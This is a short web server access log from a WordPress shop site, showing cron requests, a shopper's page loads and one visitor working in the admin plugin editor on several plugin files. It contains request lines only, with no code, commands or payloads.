182.3.169.128 - - [25/Feb/2026:12:33:50 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772022829 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:33:50 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:33:57 +0000] "POST /wp-cron.php?doing_wp_cron=1772022837.1721460819244384765625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:33:56 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
212.142.114.39 - - [25/Feb/2026:12:34:43 +0000] "GET /wp-content/uploads/fbrfg/favicon.ico HTTP/1.1" 304 - "https://caketoppers.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Mobile/15E148 Safari/604.1"
54.38.145.185 - - [25/Feb/2026:12:34:44 +0000] "POST /wp-cron.php?doing_wp_cron=1772022884.8111240863800048828125 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
212.142.114.39 - - [25/Feb/2026:12:34:43 +0000] "POST /?wc-ajax=get_refreshed_fragments HTTP/1.1" 200 1405 "https://caketoppers.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Mobile/15E148 Safari/604.1"
54.38.145.185 - - [25/Feb/2026:12:34:58 +0000] "POST /wp-cron.php?doing_wp_cron=1772022898.5297200679779052734375 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:34:56 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:35:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:35:07 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 63 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:35:11 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:35:31 +0000] "POST /wp-cron.php?doing_wp_cron=1772022931.0004689693450927734375 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
54.38.145.185 - - [25/Feb/2026:12:35:31 +0000] "POST /wp-cron.php?doing_wp_cron=1772022931.0004599094390869140625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:35:28 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:35:29 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:36:04 +0000] "POST /wp-cron.php?doing_wp_cron=1772022964.8067419528961181640625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:36:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:36:33 +0000] "POST /wp-cron.php?doing_wp_cron=1772022993.6138501167297363281250 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:36:31 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 63 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:37:08 +0000] "POST /wp-cron.php?doing_wp_cron=1772023028.6811830997467041015625 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:37:06 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:37:12 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:37:31 +0000] "POST /wp-cron.php?doing_wp_cron=1772023051.9476840496063232421875 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
